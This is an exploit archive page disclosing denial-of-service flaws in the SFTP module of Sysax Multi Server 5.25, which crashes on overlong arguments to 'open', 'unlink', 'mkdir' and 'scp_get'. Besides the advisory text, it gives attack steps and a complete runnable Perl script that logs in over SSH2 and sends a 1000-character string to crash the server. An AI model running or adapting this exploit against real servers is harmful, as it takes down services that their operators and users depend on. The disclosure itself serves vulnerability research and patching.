what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sysax Multi Server 5.25 Denial Of Service

Sysax Multi Server 5.25 Denial Of Service
Posted Jun 23, 2010
Authored by leinakesi

Sysax Multi Server version 5.25 suffers from denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability
SHA-256 | 38e28b8ca34f7d09b76c40fd944821c5776f8cfafd638821d08b74cf4dd71b62

Sysax Multi Server 5.25 Denial Of Service

Change Mirror Download

[*]Title: Sysax Multi Server(SFTP module) "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
[*]Product: Sysax Multi Server
[*]Vendor: Codeorigin, LLC
[*]Version: 5.25 (earlier versions may also be affected)
[*]Platform: Windows
[*]Type of Vulnerability: Buffer overflow -->DoS
[*]Risk rating: Medium
[*]Date of Discovery: 21-Jun-2010
[*]Discoverd by: leinakesi (leinakesi[at]gmail[dot]com)



Overview:
1.vendor description of software
------------------------------------------------
A SSH2 and FTP server for Microsoft windows® that enables system administrators to support multiple protocol access to user accounts. FTPS, SFTP, and HTTPS based file transfers are supported in addition to FTP, Telnet, and Secure Shell access. Sysax Multi Server lets system administrators authenticate users using existing windows user accounts or by creating custom accounts, or a combination of both methods. A convenient web browser based administration interface makes it easy to monitor the status of the server remotely.It is easy to install and does not require advanced IT skills to manage.
2.vulnerability details:
------------------------------------------------
Several Denial of Service vulnerabilities exist in SFTP module of Sysax Multi Server. The unsafe commands include "open","unlink", "mkdir" and etc. .which can not handle overlength strings properly.

If you could log on the server successfully, take the following steps and the Sysax Multi server will crash which would lead to Denial of Service attack:
#initialize $FUZZ = "A" x 1000
1. $ssh2 = Net::SSH2->new();
2. $ssh2->connect($server, $port);
3. $ssh2->auth_password($user, $pass);
#there are several ways to compromise the server, I list them here as 4.1, 4.2, and etc. ...
4.1 $scpget = $ssh2->scp_get($FUZZ);
4.2 $sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);
4.3 $sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);
4.4 $sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);
5 $ssh2->disconnect();


Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities

use Net::SSH2;
use Getopt::Std;

$FUZZ = "A" x 1000;

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
#any of the following commands will cause the server carsh.

$scpget = $ssh2->scp_get($FUZZ) || die "server crashed.\n";
# $sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);
# $sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);
# $sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);


print "\nover\n";

$ssh2->disconnect();
exit(0);

Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close